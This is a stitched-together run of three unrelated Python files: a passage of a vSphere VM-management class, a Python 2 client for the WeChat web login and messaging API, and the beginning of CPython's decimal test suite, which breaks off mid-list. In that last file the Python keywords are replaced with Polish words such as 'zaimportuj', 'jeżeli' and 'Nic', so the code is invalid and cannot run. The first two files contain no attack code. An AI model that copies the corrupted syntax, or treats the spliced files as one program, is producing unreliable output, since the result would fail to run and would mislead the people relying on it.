get_template: A boolean describing if it should return template names also.
Returns: A list of VMs.
"""
# Use some pyVmomi internals to get vm propsets back directly with requested properties,
# so we skip the network overhead of returning full managed objects
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = ['name', 'config.template', 'config.uuid',
'runtime.connectionState']
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
# Ensure get_template is either True or False to match the config.template property
get_template = bool(get_template)
# Select the vms or templates based on get_template and the returned properties
obj_list = []
for object_content in object_contents:
# Nested property lookups work, but the attr lookup on the
# vm object still triggers a request even though the vm
# object already "knows" the answer in its cached object
# content. So we just pull the value straight out of the cache.
vm_props = {p.name: p.val for p in object_content.propSet}
if vm_props.get('config.template') == get_template:
if (vm_props.get('runtime.connectionState') == "inaccessible" and
inaccessible) or vm_props.get(
'runtime.connectionState') != "inaccessible":
obj_list.append(vm_props['name'])
return obj_list
def all_vms(self):
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = ['name', 'config.template']
property_spec.type = vim.VirtualMachine
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
result = []
for vm in object_contents:
vm_props = {p.name: p.val for p in vm.propSet}
if vm_props.get('config.template'):
continue
try:
ip = str(vm.obj.summary.guest.ipAddress)
except AttributeError:
ip = None
try:
uuid = str(vm.obj.summary.config.uuid)
except AttributeError:
uuid = None
result.append(
VMInfo(
uuid,
str(vm.obj.summary.config.name),
str(vm.obj.summary.runtime.powerState),
ip,
)
)
return result
def get_vm_guid(self, vm_name):
vm = self._get_vm(vm_name)
try:
return str(vm.summary.config.uuid)
except AttributeError:
return None
def get_vm_name_from_ip(self, ip):
""" Gets the name of a vm from its IP.
Args:
ip: The ip address of the vm.
Returns: The vm name for the corresponding IP."""
vms = self.content.searchIndex.FindAllByIp(ip=ip, vmSearch=True)
# As vsphere remembers the last IP a vm had, when we search we get all
# of them. Consequently we need to store them all in a dict and then sort
# them to find out which one has the latest boot time. I am going out on
# a limb and saying that searching for several vms and querying each object
# is quicker than finding all machines and recording the bootTime and ip address
# of each, before iterating through all of them to weed out the ones we care
# about, but I could be wrong.
boot_times = {}
for vm in vms:
if vm.name not in boot_times:
boot_times[vm.name] = datetime.fromtimestamp(0)
try:
boot_times[vm.name] = vm.summary.runtime.bootTime
except Exception:
pass
if boot_times:
newest_boot_time = sorted(boot_times.items(), key=operator.itemgetter(1),
reverse=True)[0]
return newest_boot_time[0]
else:
raise VMNotFoundViaIP('The requested IP is not known as a VM')
def start_vm(self, vm_name):
self.wait_vm_steady(vm_name)
if self.is_vm_running(vm_name):
self.logger.info(" vSphere VM %s is already running" % vm_name)
return True
else:
self.logger.info(" Starting vSphere VM %s" % vm_name)
vm = self._get_vm(vm_name)
vm.PowerOnVM_Task()
self.wait_vm_running(vm_name)
return True
def stop_vm(self, vm_name):
self.wait_vm_steady(vm_name)
if self.is_vm_stopped(vm_name):
self.logger.info(" vSphere VM %s is already stopped" % vm_name)
return True
else:
self.logger.info(" Stopping vSphere VM %s" % vm_name)
vm = self._get_vm(vm_name)
if self.is_vm_suspended(vm_name):
self.logger.info(
" Resuming suspended VM %s before stopping." % vm_name
)
vm.PowerOnVM_Task()
self.wait_vm_running(vm_name)
vm.PowerOffVM_Task()
self.wait_vm_stopped(vm_name)
return True
def delete_vm(self, vm_name):
self.wait_vm_steady(vm_name)
self.logger.info(" Deleting vSphere VM %s" % vm_name)
vm = self._get_vm(vm_name)
self.stop_vm(vm_name)
task = vm.Destroy_Task()
try:
wait_for(lambda: self._task_status(task) == 'success', delay=3, num_sec=600)
return self._task_status(task) == 'success'
except TimedOutError:
return False
def is_host_connected(self, host_name):
host = self._get_obj(vim.HostSystem, name=host_name)
return host.summary.runtime.connectionState == "connected"
def create_vm(self, vm_name):
raise NotImplementedError('This function has not yet been implemented.')
def restart_vm(self, vm_name):
self.logger.info(" Restarting vSphere VM %s" % vm_name)
return self.stop_vm(vm_name) and self.start_vm(vm_name)
def list_vm(self, inaccessible=False):
return self._get_list_vms(inaccessible=inaccessible)
def list_template(self):
return self._get_list_vms(get_template=True)
def list_flavor(self):
raise NotImplementedError('This function is not supported on this platform.')
def list_host(self):
return [str(h.name) for h in self._get_obj_list(vim.HostSystem)]
def list_host_datastore_url(self, host_name):
host = self._get_obj(vim.HostSystem, name=host_name)
return [str(d.summary.url) for d in host.datastore]
def list_datastore(self):
return [str(h.name) for h in self._get_obj_list(vim.Datastore) if h.host]
def list_cluster(self):
return [str(h.name) for h in self._get_obj_list(vim.ClusterComputeResource)]
def list_resource_pools(self):
return [str(h.name) for h in self._get_obj_list(vim.ResourcePool)]
def info(self):
# NOTE: Can't find these two methods in either psphere or suds
# return '{} {}'.format(self.api.get_server_type(), self.api.get_api_version())
return '{} {}'.format(self.content.about.apiType, self.content.about.apiVersion)
def connect(self):
pass
def disconnect(self):
pass
def vm_status(self, vm_name):
return str(self._get_vm(vm_name, force=True).runtime.powerState)
def vm_creation_time(self, vm_name):
"""Detect the vm_creation_time either via uptime if non-zero, or by last boot time
The API provides no sensible way to actually get this value. The only way in which
vcenter API MAY have this is by filtering through events
Return tz-naive datetime object
"""
vm = self._get_vm(vm_name)
filter_spec = vim.event.EventFilterSpec(
entity=vim.event.EventFilterSpec.ByEntity(
entity=vm, recursion=vim.event.EventFilterSpec.RecursionOption.self),
eventTypeId=['VmDeployedEvent', 'VmCreatedEvent'])
collector = self.content.eventManager.CreateCollectorForEvents(filter=filter_spec)
collector.SetCollectorPageSize(1000) # max allowed value
events = collector.latestPage
collector.DestroyCollector() # limited number of collectors allowed per client
if events:
creation_time = events.pop().createdTime # datetime object
else:
# no events found for VM, fallback to last boot time
creation_time = vm.runtime.bootTime
if not creation_time:
raise VMCreationDateError('Could not find a creation date for {}'.format(vm_name))
# localize and make tz-naive
return creation_time.astimezone(pytz.UTC)
def get_vm_host_name(self, vm_name):
vm = self._get_vm(vm_name)
return str(vm.runtime.host.name)
def get_vm_datastore_path(self, vm_name, vm_config_datastore):
vm = self._get_vm(vm_name)
datastore_url = [str(datastore.url)
for datastore in vm.config.datastoreUrl
if datastore.name in vm_config_datastore]
return datastore_url.pop()
def get_vm_config_files_path(self, vm_name):
vm = self._get_vm(vm_name)
vmfilespath = vm.config.files.vmPathName
return str(vmfilespath)
def in_steady_state(self, vm_name):
return self.vm_status(vm_name) in {self.POWERED_ON, self.POWERED_OFF, self.SUSPENDED}
def is_vm_running(self, vm_name):
return self.vm_status(vm_name) == self.POWERED_ON
def wait_vm_running(self, vm_name, num_sec=240):
self.logger.info(" Waiting for vSphere VM %s to change status to ON" % vm_name)
wait_for(self.is_vm_running, [vm_name], num_sec=num_sec)
def is_vm_stopped(self, vm_name):
return self.vm_status(vm_name) == self.POWERED_OFF
def wait_vm_stopped(self, vm_name, num_sec=240):
self.logger.info(" Waiting for vSphere VM %s to change status to OFF" % vm_name)
wait_for(self.is_vm_stopped, [vm_name], num_sec=num_sec)
def is_vm_suspended(self, vm_name):
return self.vm_status(vm_name) == self.SUSPENDED
def wait_vm_suspended(self, vm_name, num_sec=360):
self.logger.info(" Waiting for vSphere VM %s to change status to SUSPENDED" % vm_name)
wait_for(self.is_vm_suspended, [vm_name], num_sec=num_sec)
def suspend_vm(self, vm_name):
self.wait_vm_steady(vm_name)
self.logger.info(" Suspending vSphere VM %s" % vm_name)
vm = self._get_vm(vm_name)
if self.is_vm_stopped(vm_name):
raise VMInstanceNotSuspended(vm_name)
else:
vm.SuspendVM_Task()
self.wait_vm_suspended(vm_name)
return True
def rename_vm(self, vm_name, new_vm_name):
vm = self._get_vm(vm_name)
task = vm.Rename_Task(newName=new_vm_name)
# Cycle until the new named vm is found
# That must happen or the error state can come up too
while not self.does_vm_exist(new_vm_name):
task = self._get_updated_obj(task)
if task.info.state == "error":
return vm_name # Old vm name if error
time.sleep(0.5)
else:
# The newly renamed VM is found
return new_vm_name
@staticmethod
def _progress_log_callback(logger, source, destination, progress):
logger.info("Provisioning progress {}->{}: {}".format(
source, destination, str(progress)))
def _pick_datastore(self, allowed_datastores):
# Pick a datastore by space
possible_datastores = [
ds for ds in self._get_obj_list(vim.Datastore)
if ds.name in allowed_datastores and ds.summary.accessible and
ds.summary.multipleHostAccess and ds.overallStatus != "red"]
possible_datastores.sort(
key=lambda ds: float(ds.summary.freeSpace) / float(ds.summary.capacity),
reverse=True)
if not possible_datastores:
raise Exception("No possible datastores!")
return possible_datastores[0]
def clone_vm(self, source, destination, resourcepool=None, datastore=None, power_on=True,
sparse=False, template=False, provision_timeout=1800, progress_callback=None,
allowed_datastores=None, cpu=None, ram=None, **kwargs):
"""Clone a VM"""
try:
try:
vm = self._get_vm(vm_name=destination)
except VMInstanceNotFound:
vm = None
if vm:
raise Exception("VM already present!")
except VMInstanceNotFound:
pass
if progress_callback is None:
progress_callback = partial(self._progress_log_callback, self.logger,
source, destination)
source_template = self._get_vm(source)
vm_clone_spec = vim.VirtualMachineCloneSpec()
vm_reloc_spec = vim.VirtualMachineRelocateSpec()
# DATASTORE
if isinstance(datastore, six.string_types):
vm_reloc_spec.datastore = self._get_obj(vim.Datastore, name=datastore)
elif isinstance(datastore, vim.Datastore):
vm_reloc_spec.datastore = datastore
elif datastore is None:
if allowed_datastores is not None:
# Pick a datastore by space
vm_reloc_spec.datastore = self._pick_datastore(allowed_datastores)
else:
# Use the same datastore
datastores = source_template.datastore
if isinstance(datastores, (list, tuple)):
vm_reloc_spec.datastore = datastores[0]
else:
vm_reloc_spec.datastore = datastores
else:
raise NotImplementedError("{} not supported for datastore".format(datastore))
progress_callback("Picked datastore `{}`".format(vm_reloc_spec.datastore.name))
# RESOURCE POOL
if isinstance(resourcepool, vim.ResourcePool):
vm_reloc_spec.pool = resourcepool
else:
vm_reloc_spec.pool = self._get_resource_pool(resourcepool)
progress_callback("Picked resource pool `{}`".format(vm_reloc_spec.pool.name))
vm_reloc_spec.host = None
if sparse:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().sparse
else:
vm_reloc_spec.transform = vim.VirtualMachineRelocateTransformation().flat
vm_clone_spec.powerOn = power_on
vm_clone_spec.template = template
vm_clone_spec.location = vm_reloc_spec
vm_clone_spec.snapshot = None
if cpu is not None:
vm_clone_spec.config.numCPUs = int(cpu)
if ram is not None:
vm_clone_spec.config.memoryMB = int(ram)
try:
folder = source_template.parent.parent.vmParent
except AttributeError:
folder = source_template.parent
progress_callback("Picked folder `{}`".format(folder.name))
task = source_template.CloneVM_Task(folder=folder, name=destination, spec=vm_clone_spec)
def _check(store=[task]):
try:
if hasattr(store[0].info, 'progress') and store[0].info.progress is not None:
progress_callback("{}/{}%".format(store[0].info.state, store[0].info.progress))
else:
progress_callback("{}".format(store[0].info.state))
except AttributeError:
pass
if store[0].info.state not in {"queued", "running"}:
return True
else:
store[0] = self._get_updated_obj(store[0])
return False
wait_for(_check, num_sec=provision_timeout, delay=4)
if task.info.state != 'success':
self.logger.error('Clone VM failed: %s', get_task_error_message(task))
raise VMInstanceNotCloned(source)
else:
return destination
def mark_as_template(self, vm_name, **kwargs):
self._get_vm(vm_name).MarkAsTemplate() # Returns None
def deploy_template(self, template, **kwargs):
kwargs["power_on"] = kwargs.pop("power_on", True)
kwargs["template"] = False
destination = kwargs.pop("vm_name")
start_timeout = kwargs.pop("timeout", 1800)
self.clone_vm(template, destination, **kwargs)
if kwargs["power_on"]:
self.wait_vm_running(destination, num_sec=start_timeout)
else:
self.wait_vm_stopped(destination, num_sec=start_timeout)
return destination
def remove_host_from_cluster(self, host_name):
host = self._get_obj(vim.HostSystem, name=host_name)
task = host.DisconnectHost_Task()
status, t = wait_for(self._task_wait, [task])
if status != 'success':
raise HostNotRemoved("Host {} not removed: {}".format(
host_name, get_task_error_message(task)))
task = host.Destroy_Task()
status, t = wait_for(self._task_wait, [task], fail_condition=None)
return status == 'success'
def vm_hardware_configuration(self, vm_name):
vm = self._get_vm(vm_name)
return {
'ram': vm.config.hardware.memoryMB,
'cpu': vm.config.hardware.numCPU,
}
def usage_and_quota(self):
installed_ram = 0
installed_cpu = 0
used_ram = 0
used_cpu = 0
for host in self._get_obj_list(vim.HostSystem):
installed_ram += host.systemResources.config.memoryAllocation.limit
installed_cpu += host.summary.hardware.numCpuCores
property_spec = vmodl.query.PropertyCollector.PropertySpec()
property_spec.all = False
property_spec.pathSet = ['name', 'config.template']
property_spec.type = 'VirtualMachine'
pfs = self._build_filter_spec(self.content.rootFolder, property_spec)
object_contents = self.content.propertyCollector.RetrieveProperties(specSet=[pfs])
for vm in object_contents:
vm_props = {p.name: p.val for p in vm.propSet}
if vm_props.get('config.template'):
continue
if vm.obj.summary.runtime.powerState.lower() != 'poweredon':
continue
used_ram += vm.obj.summary.config.memorySizeMB
used_cpu += vm.obj.summary.config.numCpu
return {
# RAM
'ram_used': used_ram,
'ram_total': installed_ram,
'ram_limit': None,
# CPU
'cpu_used': used_cpu,
'cpu_total': installed_cpu,
'cpu_limit': None,
}
def add_disk_to_vm(self, vm_name, capacity_in_kb, provision_type=None, unit=None):
"""
Create a disk on the given datastore (by name)
Community Example used
https://github.com/vmware/pyvmomi-community-samples/blob/master/samples/add_disk_to_vm.py
Return task type from Task.result or Task.error
https://github.com/vmware/pyvmomi/blob/master/docs/vim/TaskInfo.rst
Args:
vm_name (string): name of the vm to add disk to
capacity_in_kb (int): capacity of the new drive in Kilobytes
provision_type (string): 'thin' or 'thick', will default to thin if invalid option
unit (int): The unit number of the disk to add, use to override existing disk. Will
search for next available unit number by default
Returns:
(bool, task_result): Tuple containing boolean True if task ended in success,
and the contents of task.result or task.error depending on state
"""
provision_type = provision_type if provision_type in ['thick', 'thin'] else 'thin'
vm = self._get_vm(vm_name=vm_name)
# if passed unit matches existing device unit, match these values too
key = None
controller_key = None
unit_number = None
virtual_disk_devices = [
device for device
in vm.config.hardware.device if isinstance(device, vim.vm.device.VirtualDisk)]
for dev in virtual_disk_devices:
if unit == int(dev.unitNumber):
# user specified unit matching existing disk, match key too
key = dev.key
unit_number = unit or int(dev.unitNumber) + 1
if unit_number == 7: # reserved
unit_number += 1
controller_key = dev.controllerKey
if not (controller_key or unit_number):
raise ValueError('Could not identify VirtualDisk device on given vm')
# create disk backing specification
backing_spec = vim.vm.device.VirtualDisk.FlatVer2BackingInfo()
backing_spec.diskMode = 'persistent'
backing_spec.thinProvisioned = (provision_type == 'thin')
# create disk specification, attaching backing
disk_spec = vim.vm.device.VirtualDisk()
disk_spec.backing = backing_spec
disk_spec.unitNumber = unit_number
if key: # only set when overriding existing disk
disk_spec.key = key
disk_spec.controllerKey = controller_key
disk_spec.capacityInKB = capacity_in_kb
# create device specification, attaching disk
device_spec = vim.vm.device.VirtualDeviceSpec()
device_spec.fileOperation = 'create'
device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.add
device_spec.device = disk_spec
# create vm specification for device changes
vm_spec = vim.vm.ConfigSpec()
vm_spec.deviceChange = [device_spec]
# start vm reconfigure task
task = vm.ReconfigVM_Task(spec=vm_spec)
def task_complete(task_obj):
status = task_obj.info.state
return status not in ['running', 'queued']
try:
wait_for(task_complete, [task])
except TimedOutError:
self.logger.exception('Task did not go to success state: {}'.format(task))
finally:
if task.info.state == 'success':
result = (True, task.info.result)
elif task.info.state == 'error':
result = (False, task.info.error)
else: # shouldn't happen
result = (None, None)
return result
|
client.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import re
import sys
import time
import json
import random
import logging
import requests
import threading
import qrcode
from lxml import etree
logging.basicConfig()
SPECIAL_USERS = ['newsapp', 'fmessage', 'filehelper', 'weibo', 'qqmail', 'tmessage',
'qmessage', 'qqsync', 'floatbottle', 'lbsapp', 'shakeapp', 'medianote',
'qqfriend', 'readerapp', 'blogapp', 'facebookapp', 'masssendapp', 'meishiapp',
'feedsapp', 'voip', 'blogappweixin', 'weixin', 'brandsessionholder',
'weixinreminder', 'wxid_novlwrv3lqwv11', 'gh_22b87fa7cb3c', 'officialaccounts',
'wxitil', 'userexperience_alarm', 'notification_messages']
def timestamp():
return int(time.time() * 10**6)
def isGroupId(wxid):
return wxid[:2] == '@@' and (len(wxid) - 2) % 32 == 0
def isContactId(wxid):
return wxid[0] == '@' and (len(wxid) - 1) % 32 == 0
class MessageHandler(object):
def on_login(self, client):
print('[+] Initialize done. '
'{} special accounts, '
'{} official accounts, '
'{} groups, '
'{} persons.'.format(len(client.special_accounts),
len(client.official_accounts),
len(client.groups),
len(client.contacts)))
def on_logout(self, client):
pass
def on_event(self, client, event):
pass
def on_message(self, client, message):
pass
class WxClient(object):
def __init__(self, handler=MessageHandler(), loglevel=logging.INFO):
self.logger = logging.getLogger('WxClient')
self.logger.setLevel(loglevel)
self.handler = handler
self.uri = ''
self.base = ''
self.skey = ''
self.sid = ''
self.uin = ''
self.pass_ticket = ''
self.deviceid = 'e' + ''.join([str(random.randint(0,9)) for i in range(15)])
self.jsonsynckeys = []
self.session = requests.Session()
self.special_accounts = []
self.official_accounts = []
self.contacts = []
self.groups = []
def start_background(self):
uuid = self.get_uuid()
code = self.get_qrcode(uuid)
self.show_qrcode(code)
print '[+] Please Scan ...'
self.wait_scan(uuid)
print '[+] Please Comfirm ...'
self.wait_comfirm(uuid)
print '[+] Initializing ...'
self.webwxlogin()
self.webwxinit()
self.webwxgetcontact()
#self.webwxbatchgetcontact()
loopthread = threading.Thread(target=self.syncloop)
loopthread.daemon = True
loopthread.start()
def syncloop(self):
running = True
while running:
(retcode, selector) = self.syncheck()
if retcode == '0':
if selector == '0':
self.handler.on_event(self, 'SYN_CHECK_AGAIN')
continue
else:
self.handler.on_event(self, 'SYN_CHECK_UPDATE')
self.webwxsync()
elif retcode == '1101':
self.handler.on_logout(self)
running = False
else :
self.handler.on_event(self, 'SYN_CHECK_ERROR {}'.format(retcode))
running = False
def get_uuid(self):
uuid = ''
url = 'https://login.weixin.qq.com/jslogin'
params = {
'appid':'wx782c26e4c19acffb',
'fun':'new',
'lang':'en_US',
'_': timestamp()
}
response = self.session.post(url, data=params)
regx = r'window.QRLogin.code = (\d+); window.QRLogin.uuid = "(\S+?)"'
match = re.search(regx, response.content)
if match and match.group(1) == '200':
uuid = match.group(2)
self.logger.debug('Get uuid:' + uuid)
else:
self.logger.warn('Fail to get uuid, response:\n' + response.text)
return uuid
def get_qrcode(self, uuid):
data = 'https://login.weixin.qq.com/l/' + uuid
code = qrcode.QRCode(
version=1,#Range from 1 to 40, controls the size of qr code, 1 = smallest = 21x21 matrix
error_correction=qrcode.constants.ERROR_CORRECT_L,
box_size=10,
border=4
)
code.add_data(data)
return code
def show_qrcode(self, code):
if sys.platform.startswith('win'):
img = code.make_image()
imgpath = 'login.png';
with open(imgpath, 'wb') as f:
img.save(f, kind='PNG')
os.startfile(imgpath)
else:
code.print_ascii(tty=True)
def wait_scan(self, uuid):
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip={}&uuid={}&_={}'.format(
1, uuid, timestamp() )
response = self.session.get(url)
match = re.search(r'window.code=(\d+);', response.content)
status = False
if match :
code = match.group(1)
self.logger.debug('Scan response:' + response.content)
if '201' == code:
self.handler.on_event(self, 'SCAN_SUCCESS')
status = True
elif '408' == code:
self.handler.on_event(self, 'SCAN_TIMEOUT')
else:
self.handler.on_event(self, 'SCAN_ERROR')
return status
def wait_comfirm(self, uuid):
url = 'https://login.weixin.qq.com/cgi-bin/mmwebwx-bin/login?tip={}&uuid={}&_={}'.format(
0, uuid, timestamp() )
response = self.session.get(url)
match = re.search(r'window.code=(\d+);', response.content)
status = False
if match :
code = match.group(1)
self.logger.debug('Comfirm response:' + response.content)
if '200' == code:
self.handler.on_event(self, 'COMFIRM_SUCCESS')
status = self.init_url(response.text)
elif '408' == code:
self.handler.on_event(self, 'COMFIRM_TIMEOUT')
else:
self.handler.on_event(self, 'COMFIRM_ERROR')
return status
def init_url(self, text):
match = re.search(r'window.redirect_uri="(\S+?)";', text)
status = False
if match :
self.uri = match.group(1)
self.base = self.uri[:self.uri.rfind('/')]
self.logger.debug('Comfirmed, base={}'.format(self.base))
self.logger.debug('Comfirmed, uri={}'.format(self.uri))
status = True
return status
def webwxlogin(self):
success = True
url = self.uri + '&fun=new&version=v2'
response = self.session.get(url)
if(response.status_code == 200):
self.logger.debug('login response:' + response.text)
root = etree.fromstring(response.text)
for node in root:
if node.tag == 'skey':
self.skey = node.text
elif node.tag == 'wxsid':
self.sid = node.text
elif node.tag == 'wxuin':
self.uin = node.text
elif node.tag == 'pass_ticket':
self.pass_ticket = node.text
else:
pass
if '' in (self.skey, self.sid, self.uin, self.pass_ticket):
success = False
else:
success = False
self.logger.warn('webwxlogin error:{}'.format(response.status_code))
return success
def update_contacts(self, clist):
for contact in clist:
uid = contact['UserName']
nick = contact['NickName']
remark = contact['RemarkName']
numMembers = contact['MemberCount']
vflag = contact['VerifyFlag']
if uid[0:2] == '@@' and numMembers > 0:
self._update(self.groups, contact)
elif uid[0] != '@':
self._update(self.special_accounts, contact)
elif vflag != 0 and vflag % 8 == 0:
self._update(self.official_accounts, contact)
else:
self._update(self.contacts, contact)
def _update(self, cachedlist, element):
incache = False
for i in xrange(0,len(cachedlist)):
if cachedlist[i]['UserName'] == element['UserName']:
cachedlist[i] = element
incache = True
break
if not incache:
cachedlist.append(element)
def webwxinit(self):
url = self.base + '/webwxinit?r={}&pass_ticket={}'.format(
timestamp(), self.pass_ticket )
params = {
'BaseRequest': self._getBaseRequest()
}
self.logger.debug('webwxinit request:' + url)
self.logger.debug('webwxinit params:' + str(params))
response = self.session.post(url, json=params)
if(response.status_code == 200):
if self.logger.getEffectiveLevel() <= logging.DEBUG:
dumpfile = 'webwxinit.json'
with open(dumpfile, 'w') as f:
f.write(response.content)
self.logger.debug('saving webwxinit response to ' + dumpfile)
rjson = response.json()
self.jsonsynckeys = rjson['SyncKey']
self.update_contacts(rjson['ContactList'])
self.myid = rjson['User']['UserName'].encode('utf-8')
self.logger.debug('synckeys:' + self._getSyncKeyStr())
else:
self.logger.warn('webwxinit error:{}'.format(response.status_code))
def webwxgetcontact(self):
url = self.base + '/webwxgetcontact?lang=en_US&r={}&pass_ticket={}&skey={}'.format(
timestamp(), self.pass_ticket, self.skey)
response = self.session.get(url)
if(response.status_code == 200):
if self.logger.getEffectiveLevel() <= logging.DEBUG:
dumpfile = 'webwxgetcontact.json'
self.logger.debug('saving webwxinit response to ' + dumpfile)
with open(dumpfile, 'w') as f:
f.write(response.content)
rjson = response.json()
self.update_contacts(rjson['MemberList'])
self.handler.on_login(self)
else:
self.logger.warn('webwxgetcontact error:{}'.format(response.status_code))
def webwxbatchgetcontact(self):
# Not needed right now
url = self.base + '/webwxbatchgetcontact?type=ex&r={}&pass_ticket={}'.format(
timestamp(), self.pass_ticket)
params = {
'BaseRequest': self._getBaseRequest(),
"Count": len(self.groups),
"List": [{"UserName": g['UserName'], "EncryChatRoomId":""} for g in self.groups]
}
response = self.session.post(url, data=params)
if response.status_code == 200:
pass
def syncheck(self):
retcode = -1
selector = -1
url = 'https://webpush.wx2.qq.com/cgi-bin/mmwebwx-bin/synccheck'
params = {
'_': timestamp(),
'skey': self.skey,
'sid': self.sid,
'uin': self.uin,
'deviceid': self.deviceid,
'synckey': self._getSyncKeyStr(),
'r': timestamp()
}
response = self.session.get(url, params=params)
self.logger.debug('syncheck get:' + response.url)
if(response.status_code == 200):
regx = r'window.synccheck={retcode:"(\d+)",selector:"(\d+)"}'
match = re.search(regx, response.content)
if match:
retcode = match.group(1)
selector = match.group(2)
else:
self.logger.warn('syncheck response:{}'.format(response.content))
else:
self.logger.warn('syncheck error:{}'.format(response.status_code))
self.logger.debug('retcode:{}, selector:{}'.format(retcode, selector))
return (retcode, selector)
def webwxsync(self):
url = self.base + '/webwxsync?sid={}&skey={}&pass_ticket={}'.format(
self.sid, self.skey, self.pass_ticket)
params = {
'BaseRequest': self._getBaseRequest(),
'SyncKey': self.jsonsynckeys,
'rr': ~timestamp()
}
response = self.session.post(url, json=params)
self.logger.debug('webwxsync post:' + response.url)
if response.status_code == 200:
jresp = response.json()
if jresp['BaseResponse']['Ret'] == 0:
self.jsonsynckeys = jresp['SyncKey']
if jresp['AddMsgCount'] > 0:
for msg in jresp['AddMsgList']:
self.handler.on_message(self, msg)
if jresp['ModContactCount'] > 0:
self.update_contacts(jresp['ModContactList'])
if 'SyncKey' in jresp:
self.jsonsynckeys = jresp['SyncKey']
else:
self.logger.warn('webwxsync repsonse:{}'.format(jresp['BaseResponse']['Ret']))
else:
self.logger.warn('webwxsync error:{}'.format(response.status_code))
def name2id(self, alias):
if alias in SPECIAL_USERS:
return alias
wxid = 'filehelper'
for contact in self.groups + self.official_accounts + self.contacts:
if contact['NickName'].encode('latin1') == alias or contact['RemarkName'].encode('latin1') == alias:
wxid = contact['UserName']
break
return wxid
def id2name(self, wxid):
name = wxid[:6]
cacheMissed = True
if isGroupId(wxid):
for group in self.groups:
if group['UserName'] == wxid:
name = group['NickName']
cacheMissed = False
break
elif isContactId(wxid):
for contact in self.official_accounts + self.contacts:
if contact['UserName'] == wxid:
if contact['RemarkName'] != '':
name = contact['RemarkName']
else:
name = contact['NickName']
cacheMissed = False
break
elif wxid in SPECIAL_USERS:
name = wxid
cacheMissed = False
if cacheMissed:
self.logger.debug('Unknow id:{}'.format(wxid))
return name.encode('latin1')
def webwxsendmsg(self, wxid, text):
url = self.base + '/webwxsendmsg?pass_ticket={}'.format(self.pass_ticket)
msgid = str(timestamp()) + str(int(random.random() * 10))
if type(text) == str:
utext = text.decode('utf-8')
else:
utext = text
params = {
'BaseRequest': self._getBaseRequest(),
'Msg': {
'Type': 1,
'Content': utext,
'FromUserName': self.myid,
'ToUserName': wxid,
'LocalID': msgid,
'ClientMsgId': msgid
}
}
headers = {'Content-Type': 'application/json; charset=utf-8'}
data = json.dumps(params,ensure_ascii=False)
response = self.session.post(url, data=data.encode('utf-8'), headers=headers)
if response.status_code == 200:
self.logger.debug('webwxsendmsg response len: {}'.format(len(response.content)))
else:
self.logger.warn('webwxsendmsg error {}'.format(response.status_code))
def webwxlogout(self):
url = self.base + '/webwxlogout?sid={}&skey={}&pass_ticket={}'.format(
self.sid, self.skey, self.pass_ticket)
self.session.get(url)
def _getSyncKeyStr(self):
return '|'.join([str(kv['Key']) + '_' + str(kv['Val']) for kv in self.jsonsynckeys['List']])
def _getBaseRequest(self):
baserequest = {
'Uin': self.uin,
'Sid': self.sid,
'Skey': self.skey,
'DeviceID': self.deviceid,
}
return baserequest
if __name__ == '__main__':
client = WxClient()
try:
client.start_background()
while True:
time.sleep(60)
except Exception as e :
client.webwxlogout()
print str(e)
|
test_decimal.py | # Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# oraz Facundo Batista <facundo at taniquetil.com.ar>
# oraz Raymond Hettinger <python at rcn.com>
# oraz Aahz (aahz at pobox.com)
# oraz Tim Peters
"""
These are the test cases dla the Decimal module.
There are two groups of tests, Arithmetic oraz Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called z command line przy one parameter (Arithmetic
or Behaviour) to test each part, albo without parameter to test both parts. If
you're working through IDLE, you can zaimportuj this test module oraz call test_main()
przy the corresponding argument.
"""
zaimportuj math
zaimportuj os, sys
zaimportuj operator
zaimportuj warnings
zaimportuj pickle, copy
zaimportuj unittest
zaimportuj numbers
zaimportuj locale
z test.support zaimportuj (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings)
z test.support zaimportuj (check_warnings, import_fresh_module, TestFailed,
run_with_locale, cpython_only)
zaimportuj random
zaimportuj time
zaimportuj warnings
zaimportuj inspect
spróbuj:
zaimportuj threading
wyjąwszy ImportError:
threading = Nic
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
orig_sys_decimal = sys.modules['decimal']
# fractions module must zaimportuj the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) jeżeli C inaczej Nic,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered przy respect to precedence: when an operation
# produces multiple signals, signals occurring later w the list
# should be handled before those occurring earlier w the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] jeżeli C inaczej Nic,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertPrawda(all(d[s] jeżeli s w expected inaczej nie d[s] dla s w d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
